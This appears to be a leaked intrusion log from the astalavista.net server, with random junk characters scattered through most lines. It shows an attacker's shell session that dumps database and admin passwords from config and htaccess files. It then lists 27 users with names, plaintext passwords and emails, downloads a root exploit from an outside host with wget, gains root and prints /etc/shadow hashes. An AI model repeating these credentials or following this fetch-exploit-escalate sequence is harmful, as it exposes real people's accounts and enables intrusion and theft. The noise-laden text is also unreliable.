drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend6 J0 R" Z3 V: |# P" _. S
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner9 K" [( y1 d0 y# J1 R! S/ @7 ^
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
$ p) L2 s% ]2 w5 E; @- P& Odrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config' h3 |; [" a9 Q$ H
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron a. h1 q; g/ w- x6 Y
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
% S- D- G/ J- \! p1 h-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php! i7 V& N6 W K. C+ s5 ?
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
6 l( Q/ V0 J' bdrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed) n, r1 C6 y" T9 l, a C2 F' X
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
7 u) e7 H6 q$ N- s7 E-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess' e. H/ X, n( p6 P& x
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess6 N- x: Y* O9 D9 j
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
7 K. u8 r5 j. `3 g9 E* `; @-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
; d: M: M o1 K y( X1 s. J-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
0 h; G+ @' `" A-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php3 V/ E# d& {6 l4 E7 \
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
) j/ K5 ^8 j3 @# n5 Ldrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
, Y3 ~6 p! p$ O# r3 |, ]0 Hdrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang! o$ J+ r# }8 J* ^
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
: O8 Q% ^* j9 U/ ldrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
0 q5 d# ]: t3 N1 }: q/ h. Odrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
# q4 g! z# a; E. p4 R6 ldrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata1 d; c+ u6 A" P4 y: Y
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
* J& Z: [9 ?! z' f-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf: m2 B# T: l0 m; Y' ? g0 r9 R
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
- F" _, D7 H. i) R-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt' }- V/ F0 h: E' O( r
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss) M7 h5 i: N: B' n7 J9 G3 T# V
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
/ I/ m4 \0 I/ b; X0 T# m' F J' adrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
9 s, Y+ z7 h- P1 {5 }. n/ udrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
8 W% G* M- i, H# c# D+ U9 Ddrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src* U# \ _4 @% U( q. e
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl2 l5 C# Q+ L; ]9 ^8 D# l! _
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
: K' r$ i& |) H6 xdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
+ Y8 G7 F% M+ U+ [-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php5 ~ M. J1 [$ J- [3 ~
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki; U3 W5 _5 v% R0 G
* e- d5 b" L y" u
sh-3.2$ head -20 index.php
' U/ o$ V, I! U2 _4 y2 f8 {% G<?PHP
( b. J/ E# w& K2 H/**2 d4 z# A) U1 B6 `
* Mainfile (external) for astalavistaNET v2.01 o0 A, q9 M r5 ]% e2 V
*% o% }" o+ N/ R( X
* @copyright Astalavista IT Engineering GmbH2 V1 C- j: B5 [5 y1 m" z3 Z. \
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
5 G. a% h/ ^3 }5 `/ f3 O/ N: m$ ^* @version 1.0
3 Z& {; w( S. P' q* |0 K*/% ^9 ~, s1 [+ p8 r# L: q
' @' @) v2 v& |( D, @/ X if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
& ~0 J& a" w, }% X $dontStartSession = false; ~9 b# x# c E1 e) t% e
} else {# U7 e/ j" N3 y. J& L
$dontStartSession = true;
- A; J2 H* {, Q, w9 E }
' m8 N0 p* q: ^% b* h7 d, S b) q require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
0 [: T, e* s: x# t4 p8 D5 H require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
& q6 v* l% ?# U1 p3 d require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);& S% x& L+ h: O. f$ l% q
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
- V& i* m. S3 [) a
3 B+ e& Y* X- @sh-3.2$ cd config- J+ Y% t$ h- N( M# m
sh-3.2$ ls -la
* b/ w: k3 K1 `) |8 ^7 ctotal 32" h! f: {3 U( S. \* ^
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
& j- F# b+ i3 m% rdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .." u$ l" m9 ^" l5 z( A3 N8 u
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
/ V- W( T* _' Z5 ?& O* I( H% i- k-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php* E8 b# w ^" u+ `4 T. w
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php7 y9 `9 |; `/ X! t- |$ A
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
7 C t# z3 V! `# d' U; ?-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php. y& f4 |: t$ Q& y$ ?3 |* `
+ ~3 o3 u; x. c' R3 Hsh-3.2$ cat com.conf.php" ^$ G- A3 s8 J/ b- _0 M# `/ w4 I
[snip]
! P+ K- @. H+ p/ A; \//member-database: f8 ~! H1 O4 s: F1 ~) R e# j1 P1 C
$_CONFIG['db_mem_server'] = ‘localhost’;
% [ V4 h( G) L% N$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;. w. F/ E/ U1 F
$_CONFIG['db_mem_user'] = ‘astanet_db’;; H4 z1 F1 [+ i5 ^& \ {* T8 w# D
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;5 V1 F2 ]; \/ J' ?7 r
$_CONFIG['db_mem_debug'] = false; //true or false4 x7 E2 b( h+ i# J9 g0 z9 X
//ads-database3 O: F- b9 v8 z% V
$_CONFIG['db_ads_server'] = ‘localhost’;& i7 q5 _8 i( M3 u' A( ~$ a# U
$_CONFIG['db_ads_database'] = ‘astanet_ads’;4 `, k. |" D F9 y9 t3 @
$_CONFIG['db_ads_user'] = ‘astanet_db’;
' F; R3 N8 P; b' A+ s3 [5 ]$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;, U" b5 b5 H" K- u# m0 B, z1 E4 u
$_CONFIG['db_ads_debug'] = false; //true or false v$ z) j( {# N S0 E7 J8 F/ _
//rainbow-database
; K3 V/ u I$ r" G0 i6 `$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
& `5 N' @+ R$ `7 C* j$_CONFIG['db_rainbow_database'] = ‘rainbow’;# p5 T% T3 r9 Z, `, e5 Y
$_CONFIG['db_rainbow_user'] = ‘dinu’;
0 S# c/ b( J- i6 L8 a; Z* D+ t$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
& j9 O p6 }) t- N+ c. C" u$_CONFIG['db_rainbow_debug'] = false; //true or false7 H) N" U) ^, s6 C4 T1 \/ \
//mailing lists database% ~% D8 L) _. Z! { Z( h
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
+ s; e- ]% H2 y" k5 b3 }( K6 s$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;/ ?0 \& Y7 V; ~
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;) l2 D6 G' Y: s9 Y- Q
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
+ T7 H- X* G# u; m$_CONFIG['db_mailing_lists_debug'] = false; //true or false! d4 t. y; e: G
//paypal+ |) @& N; Y0 K w) u! e
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
, Z; S* O# a2 l. S5 i" h; ]$_CONFIG['sub_pp_cmd'] = ‘_xclick’;% H" L, A+ c) J( P# P
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
, ~$ O8 W7 M( H1 w$_CONFIG['sub_pp_noship'] = ‘1′; c8 y3 P0 {! I/ e/ p& L% s% a
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
8 n6 a' J0 W7 Y; [7 V[snip]# O0 K# k* ]+ p! d8 o2 S: w) ]
/ `9 J- V- H) o
sh-3.2$ cd ..1 Y9 T# f' M0 \: a; }
sh-3.2$ cd member% l3 p4 F8 \' h
sh-3.2$ ls -la7 `9 }1 [0 ?1 V5 r' ]; `- K" e
total 202 ~1 i& _' a; ~- {, f2 @' u
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
4 U b% e5 H& b, r6 a4 Vdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
e6 t7 c; l ^6 S) I6 F* U-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
4 F. n2 P y6 s$ T& F' F6 h8 w0 v) t% |-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php' e5 K' Y1 B3 Y1 u* C; y( Y3 e
sh-3.2$ cat .htaccess% e+ w, O# r' D1 x/ y( u
SecFilterEngine off. R: p# E$ M; Q- O8 S
! S2 m; ]1 `, V: s4 f! lsh-3.2$ cd ..
; w( q( ~) V9 J+ Esh-3.2$ cd cron
% \3 ~" ~* y8 ?) a9 tsh-3.2$ ls -la
# }( u0 H$ q) B: {& r! [ {total 168
0 x9 {3 S: o$ S) L1 z4 s7 Y5 Cdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .- {: u N, m3 U& w9 \
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..5 x q" n8 _! M4 M/ F" V* O# l
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
0 E- ?3 x. {4 M E# N% p$ P-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php9 ?6 K* }5 I$ X& N* L
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
; X6 i/ d$ ]4 _-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
7 T A1 h, o/ k0 e-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
3 A( K, L* ?6 Y-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php. P& \. J; h. c6 G! e' E
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php- R9 O5 h$ m' E2 E! u! X. g5 i
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php) x# Z! G0 i4 s$ W! i1 _' m8 W
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh" z! W- J; ^- R z! y; y" d
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
( h8 D' V E4 A# _, F9 ?% j-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
$ L& T6 O4 \! Z, ~2 Q$ [" M-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php' t* d, ?6 W/ G; i8 m* q
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh+ \; }3 L! ~3 O( c2 `: v
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
1 D1 _: C) x5 c-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php3 B+ n1 L( {: ]. n9 k9 H+ q; p7 I
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
! S% v1 y1 R. s: \0 D7 h" J% e' `-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
; D4 { w9 w6 Z) P: s-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php$ l- [9 d* v( X
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
1 ^% Z" v4 J: J" B9 k& M1 U-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
~& i o( b/ w# ?: V5 @ N0 G-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php5 ?4 a7 J0 x6 v& S
) k, j; @ p- ^9 vsh-3.2$ cd ..5 `( ]0 X- A4 D' O
sh-3.2$ cd _007: Y$ f/ Z- G; a2 j
sh-3.2$ ls -la) T& |5 T5 N! ?6 u1 k; m- E5 q
total 24
* j% i. W# t3 N/ Ndrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
) Y, U, `4 G4 Z V+ V; _ f6 Y+ edrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
( W" L2 w7 ^- M-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
- T% R/ F# s: q0 m-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
2 S3 h* z2 v3 `, K0 P-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php2 `% q# M6 k6 b" L6 c
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
; ?; i8 C3 A5 G& B0 V3 n: \$ Z4 V1 D) D8 S/ e
sh-3.2$ cat .htaccess
* F! y! ~1 `0 ]' x# ^authType Basic8 Y/ D, V ?& K. u
authName Admin& r( H2 U9 V' h7 j& W
authUserFile /home/astanet/auth/.htadm_pwd& u3 W5 K4 V+ C* R& `6 W8 K
require valid-user" X2 S o* c5 Q9 x4 L& u
( w, N0 Q6 Q% e* f5 X, \
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
4 `7 h( r5 J1 d; tadmin2net:CR0bl65MwhfT
6 S8 J( z! w- b0 m; P5 L% M- J2 f& w' K1 X
sh-3.2$ mysql -u astanet_db -p
" T1 I j* C+ T @8 U: aEnter password:
: v% q: u' W1 Y) n* {2 pWelcome to the MySQL monitor. Commands end with ; or \g.# v4 { f! |! ~3 _; E% `, X/ v
Your MySQL connection id is 275153. D5 q* U4 P! P8 O0 a
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
) m3 ]! S0 Q4 w) @/ X
9 s4 \; O2 b1 M4 p0 Z" i$ wType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
x& \! w$ }, A' w5 J
: H; m4 o" q4 c' ]+ E/ h0 S# ^) Pmysql> show databases;# K# z% f! d6 V) c y
+———————–+
% J9 K! h+ ~& t. H: p| Database |
9 b: K5 s: q) p8 q" @- Y; {+———————–+
% F/ S8 v1 W. Q/ k+ p7 n" T7 z0 c| information_schema |, S: e. z2 ~# M: i+ C
| astanet_ads |6 }7 ?$ r; |0 R5 ~
| astanet_mailing_lists |5 M# y$ K3 e7 ~; {* z% G% K
| astanet_mediawiki |
7 W$ _. s3 }3 }( P$ a) |: U4 d8 U| astanet_membersystem |
, N. c6 v/ Z; a# k: }| test |! K# h9 {3 Y' o/ \5 _, E1 e X% {
+———————–+
3 W; y/ v* G& i6 rows in set (0.00 sec)
; V6 j# M* {$ _' \; J+ V" x2 O( j3 O; }8 S) a" z. C
mysql> use astanet_membersystem
- n& n* z% Z Y, n6 BDatabase changed% j# O. e2 {, X6 g5 N5 \0 v# S8 I
mysql> show tables;
. i" ~) n" N& o9 P+———————————–+" ^% ~/ {! f, z( ?' R1 x
| Tables_in_astanet_membersystem |5 d/ w! n0 t% G: E! Y% ]; |
+———————————–+
& N; c$ }6 \/ S$ C# z$ F6 j! _1 T. q| blacklist_categories |# g$ B: t7 ]. k
| blacklist_content |& L- t T5 f7 ~
| blacklist_levels |8 I/ h% _- K. e( B4 u
| blacklist_mcset |$ Y0 Y7 ~% B/ ^: a
| dir_categories |
" n, g0 l7 ~$ X& g3 R) b( l$ Q| dir_comments |6 d/ b! u0 k# F& D4 Y
| dir_links |
0 t+ i2 }8 j) k `| dir_temp |6 G3 ]. Q, v) W! \) s9 M5 H0 i
| dir_votes |; A" `8 T! b+ l& M0 i( {, U2 V
| documents |
2 t8 K2 t! b8 d7 J' d- B| documents_categories |
- w1 o- c6 u( a, ]| email_content |7 p% L. z% ?$ Y( m) L
| email_settings |" ~% [5 U, w/ I; w& ?+ ^; M5 ^7 i) o
| exploits |3 N% T0 o) V% G0 a% U. \2 b: v
| exploits_categories |
8 a4 U8 g) j7 h0 U( d0 R| exploittree_categories |2 ?6 [' h' N9 c7 B
| exploittree_exploits |
: Z; g: y+ z( Y9 O* Z+ V| home_values |
* [ v; T0 v+ Q$ `! J8 u2 t| iso_countries |' R2 b1 ^& ]/ ~' a9 v5 v* j2 y
| links_categories |
5 ] Z& Y I- v1 G8 n| links_records |
6 l& D1 d d! Q2 n }5 [# ~| links_unauth |
' X6 M2 o; u( l& h| links_votes |
/ U* _- j9 t% `3 I$ F e( _| log |
2 u1 Z7 T! q' C3 t2 c8 z5 @+ E| news_categories |
/ e. c N3 c j0 p$ v' V4 n| news_comments |
2 Y2 a& r0 S* w5 L0 A| news_emoticons |
# M5 {) W) O d$ R| news_latest |# E( Y5 J, f1 P4 w) t! K
| news_messages |
( V8 w; p# V! {& g+ v+ j+ ]| news_statistics |/ C5 a5 @7 h9 j% a7 F
| news_votes |
! {6 \+ B% d) L$ ?+ v8 r& Q| prices_content |- M' _6 H% k4 `
| prices_offers |
) k( G3 x C2 ~7 F| rss_settings |( `: {) z1 U& J- ~9 @' V# i) N
| sessions |
5 l. H' W* `: v6 E k; Q| stats_signups |
9 \3 u8 B8 Z6 f4 c6 J+ E| u2u2 |: E Y9 m3 [# b
| u2u_contact |
" r* u: K5 x6 ?| u2u_settings |: R8 y5 d9 C/ p& `* M) q P
| user_keywords_selected_categories |
9 f4 N2 F) Q2 W4 Y) F| users |$ |- `2 e" @' l
| users_ipn_test |5 L# H" Y) i# f% b& q6 _: P
| users_keyword_values |
0 m. I1 F4 W$ P; v# x; C| users_profile |( F7 Y7 U% l& @' M
| users_temp |5 z- I4 M6 p' b0 _; j7 ?1 p/ n
| users_upgrade |2 }2 G9 d2 l: d' t/ W- x$ m9 R8 u7 H
+———————————–+
* k3 @3 x/ j' y* W2 P+ C2 r46 rows in set (0.00 sec)
$ l. p3 W3 h% ?1 o/ ^+ _4 B- G
- D( K) Y7 v/ i- f5 Rmysql> describe users;
: q, R ~, B' ?4 x+————————–+————————————–+——+—–+———————+—————-+/ `9 i6 ~/ l3 i7 m0 ?
| Field | Type | Null | Key | Default | Extra |3 h% U2 X. M- X! w- f* F! a u* _ v& E
+————————–+————————————–+——+—–+———————+—————-+, c) @: Q; f1 @$ t6 {$ B0 U) ~1 b
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |6 ~) r. E3 }- O! Y
| user | varchar(50) | NO | | | |
B n( ?1 B7 W| nickname | varchar(30) | NO | MUL | anonymous | |
& C* i6 l8 H& K8 y! I' h0 ]! K || password | varchar(30) | NO | | | |
. [: G ~$ G" @" o7 o+ Y( m| userlevel | tinyint(3) | YES | MUL | NULL | |1 U. P* ]/ m- }& ]" o2 b
| exp | int(8) unsigned | NO | | 0 | |
) p7 g. l! h8 { P+ i! E6 T* O3 r| email | varchar(50) | NO | | | |( t: r0 L* I% x1 t/ y% @ `( K
| ip | varchar(15) | NO | | 0 | |% ~ G" l9 }5 C: K8 Y
| proxy | set(’0′,’1′) | NO | | 0 | |% N @ k/ _2 ?8 Y' y: ^6 T
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
+ f# v. K. v- X# B7 l| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
8 o3 P% j3 N2 r| anz_in | tinyint(1) | NO | | -1 | |9 l) s' b% }% u# P, T, H
| status | tinyint(1) unsigned | NO | | 0 | |/ _ H* {; ~$ ]) x6 e+ C
| checked | set(’0′,’1′,’2′) | NO | | 0 | |$ G8 o9 _- ], P5 F7 W" A6 ~0 d
| freemember | set(’0′,’1′) | NO | | 0 | |
2 y% I3 z. m P4 u% N$ U4 H+ V| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
- U' ]3 L9 [/ Z( [: T$ P" y| lang | tinytext | NO | | | |
) q! `9 B8 F! ^" T0 O! y3 T| adid | smallint(6) | NO | | 0 | |
" l; ^' B* _. r! T* p# M. u2 ]| pp_txn_id | varchar(255) | YES | | NULL | |
9 a. X7 Z+ T2 F| cnb_transaction_id | varchar(255) | YES | | NULL | |
6 s" J; C7 o2 _1 [) C3 B| cnb_order_id | varchar(255) | YES | | NULL | |0 R2 [+ N, V+ e% r. e
| cnb_user_id | int(11) | YES | | 0 | |
1 K& J- h' o+ ?3 y+————————–+————————————–+——+—–+———————+—————-+
8 ^5 s3 B* J" \3 r( M5 P) p, R22 rows in set (0.01 sec)
5 U: z& v$ U8 R: L q7 o8 J& U% |- |# v
mysql> select count(*) as skids from users;
4 H) K! c/ P- L C/ l5 l4 r+——-+# T$ F1 M4 E6 Q/ I5 L, S7 X; l
| skids |
5 a6 [' t$ K7 n) H+ p- @+——-+1 p% v: b$ X$ |! G' x' F! L. k
| 25199 |
4 R, X/ A C" K$ h! b1 v) \- R+——-++ j; {' [( M3 F$ `# p% T
1 row in set (0.00 sec)
3 e' q: X: z# I; O" ]( O/ Z! d4 J& i. _5 p
mysql> select user,nickname,password,email from users where userlevel = 1;
" X' }+ H& n! r# ^ L5 e' c5 a+————————–+———————-+——————+———————————–+
( u5 M1 T) ]5 a5 l| user | nickname | password | email |4 ~8 T2 Q' ?* D# v) ?/ @8 z* |
+————————–+———————-+——————+———————————–+
) k4 V) C/ M% [1 w$ m% H; a| pascal | prozac | astaman3 | 链接标记info@astalavista.net |# f& L/ S' ^* G1 j: d+ r
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
2 a: _0 @8 ^: t" I# V6 H| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |4 ?; Z1 b$ f2 ]. c! H- A/ u5 J
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
* G1 H7 p+ d! G+ B, b9 ]' T| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
- G7 p+ y. k: @& m& j- Z| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
8 B7 g: s3 k: L% v2 @| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
$ f/ r ^/ ^; w i5 Z| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |+ q" a4 j6 U0 {/ R) ]( c- ?
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
- Y6 v9 p. Y& j3 F/ j4 A% y| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |: o- T( H1 {& c6 Y8 u! e
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
' m0 { P1 x& B! j| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
% l2 m, z) l9 \" y1 i4 Y/ K| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |- G# R$ K! O" R& W+ S
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |6 G! x. c E# d
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
% }) A- }1 ~9 `7 `7 L8 e| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |8 V+ f% |2 S7 g( I8 F K; Q
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
C Z' z* `+ X1 T8 U8 X Y| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
& f, l k% y7 K" I5 ]1 q+ x, ~' X| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |/ g8 B, C& F' a1 k) c
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |/ `* H7 {( b" w+ v
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
: q- U1 v8 ^( ~* h; d1 [| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |6 B% U: Y( K6 A1 A# u- S$ I
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
% f) L8 V: ^$ K) a| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
" Q' d6 |) ^- Q+ `; D! l( Z| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
i2 H; e9 y+ Y; [| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |. J" j5 w9 d3 ?( D( x0 O
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
3 ~7 c! Q3 e: h. g9 U* M+————————–+———————-+——————+———————————–+6 R! I, }; e8 f2 d, J
27 rows in set (0.00 sec)
% h. M' z2 \3 [) H- Z0 ^; N4 d
! h# B( [9 q4 D* p$ c* m, u4 amysql> exit;2 O" P7 N3 O3 u v
Bye1 W- `3 c0 m l
# t5 ~- Q- d0 q7 e4 J. T
[~] plaintext passwords? yes,1 M/ J# ~8 _6 E! e3 ]5 N
Those so called “security professionals” who charge you $6.66 / month to
% g& B8 A: k# S/ {% fregister at their hack-proof portal, save your passwords in plaintext…
) @) Z) y1 B+ l1 l' m3 |! d+ }1 F+ Zbrilliant!
& J7 y6 x$ X2 Y1 f; t u9 r
{* r. W" N5 L1 w[~] This been fun but we want more.
4 s8 X. Y3 P( b; [4 A" a4 J4 T4 A9 r. M: U3 _$ [: R: s, h8 R" N' d
sh-3.2$ uname -a
- V6 y4 ^- k- |7 w1 ?0 _7 u6 HLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux" K/ r" } o% A1 M2 [
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]) T. I1 g- O, I- m. C% [
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]4 }: X, _9 k: s1 R- A2 [
Resolving anti.sec.labs… 13.33.33.37
0 m6 o( E4 b& C8 |Connecting to anti.sec.labs|13.33.33.37|:80… connected.
* n3 {/ P4 A9 SHTTP request sent, awaiting response… 200 OK. t3 U7 y) B: ^
Length: 18200 (18K) [text/plain]
* W: z6 B' J9 o# K5 Z Q7 ?Saving to: `g0troot’; \& y: A& U0 H8 Q+ J- g+ j# `* I
% N1 u z& A" v- H" Q- V( [
100%[=========================================================================================================================================>] 18,200 58.6K/s in
7 y7 G p& N* B. A0.3s) z- Y+ {+ E% @& X. ]
' @7 N0 A* c; G1 b$ \3 G( H( ~1 f% R6 t
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]- W- Z* K4 W `0 }
3 v4 o9 ^. b A. q `
sh-3.2$ ./g0troot -i x86_64
+ d- P' Q+ ^) a[+] g0troot - anti.sec.labs& g$ ?( t! \! h
[+] Target: 2.6.18-128.1.10.el5
/ |# j% J% o# u8 X1 H' J[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]. S! ^/ ]& K7 \4 O
1 ~( R6 z5 G0 a$ C4 s
[+] r00tr00t
5 R, j) T& @# W[~] Executing shell…
- F( e W/ o; U: B7 q6 Z1 G4 H0 y0 f: w; F( _
sh-3.2# id# [6 s9 h1 I$ @
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)! d/ Q f+ B! ~6 m3 K& m
* a6 I i' s7 z1 _3 A8 u" ]
sh-3.2# cat /etc/shadow
3 W+ g: b' b! uroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
5 Y! ?' C5 @+ J- X6 K[snip]/ A' C+ Q# _; t2 X$ k
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::- ?7 v8 H) o4 H; [
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::+ Q: a2 s# v# g7 p1 ]/ q, B$ Z
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::7 U# y" v& ~6 w R) V1 J
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::4 W' q5 _' Y5 F; d2 ]
7 w" E" ~' U i5 f3 H( }/ p) \2 u0 xsh-3.2# cat /etc/motd; G5 e6 T, f: g0 S. Q3 _ }
